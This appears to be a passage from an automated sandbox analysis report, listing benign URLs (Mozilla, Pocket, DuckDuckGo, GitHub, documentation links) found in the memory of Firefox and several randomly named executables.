Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000019.00000002.3059082762.0000025E81B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874853592.0000025E8116F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2875054403.0000025E8118A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2873550106.0000025E8111D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874578651.0000025E81153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2869331652.0000025E80F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000019.00000002.3015823343.0000025E7C9DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000019.00000002.3015823343.0000025E7C9DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3015823343.0000025E7C9F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2941797933.0000025E897F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C8AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C701CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C8AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C4B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C701CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000019.00000002.3059082762.0000025E81B7E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000019.00000002.3009852946.0000025E71011000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3009852946.0000025E71030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsjar
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: 996773cd54.exe, 0000000A.00000003.2771688785.0000000004EDB000.00000004.00001000.00020000.00000000.sdmp, 996773cd54.exe, 0000000A.00000002.2819953969.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 0000001A.00000000.2858043384.000000000088C000.00000008.00000001.01000000.00000012.sdmp, 996773cd54.exe, 0000001D.00000002.3005019658.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, 996773cd54.exe, 0000001D.00000003.2911813021.0000000004CBB000.00000004.00001000.00020000.00000000.sdmp, num.exe, 00000024.00000000.3066269323.000000000088C000.00000008.00000001.01000000.00000012.sdmp, num[1].exe.8.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000019.00000002.3033711233.0000025E802F0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2874159292.0000025E81138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874853592.0000025E8116F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3053736608.0000025E818F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2873550106.0000025E8111D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874578651.0000025E81153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2869331652.0000025E80F00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2078373325.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078647228.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2078431420.0000000005EC9000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2754320993.0000000005B66000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2874156786.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873910237.00000000059E8000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2873775956.00000000059EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000019.00000002.3033711233.0000025E802F0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3018136513.0000025E7CE7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039979682.0000025E80D65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3039979682.0000025E80D65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sAttempted
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2939160067.0000025E83995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000003.2963429453.0000025E8261E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2968004122.0000025E826AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2968004122.0000025E826A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Connecting
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2992255155.0000007863804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3009852946.0000025E7106A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2939160067.0000025E83995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D2F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000019.00000002.3034070889.0000025E80603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 00000019.00000003.2929393111.0000025E8928B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 00000019.00000003.2929393111.0000025E8928B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000019.00000002.3033711233.0000025E802F0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000003.2874159292.0000025E81138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874853592.0000025E8116F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2873550106.0000025E8111D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2874578651.0000025E81153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2869331652.0000025E80F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsexperiments/screenshots/schema.jsonexperiment-apis/sy
Source: firefox.exe, 00000019.00000003.2956838573.0000025E8914A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000019.00000003.2956838573.0000025E8914A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3023518743.0000025E7D225000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000019.00000003.2956838573.0000025E8914A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3009852946.0000025E71011000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3001120503.0000016C701CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31DE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000019.00000002.3028948986.0000025E7E9DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000019.00000002.3049479881.0000025E81528000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3038492553.0000025E80C6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2997779943.000001CB31D86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000019.00000003.2956838573.0000025E89170000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000019.00000003.2929393111.0000025E89240000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
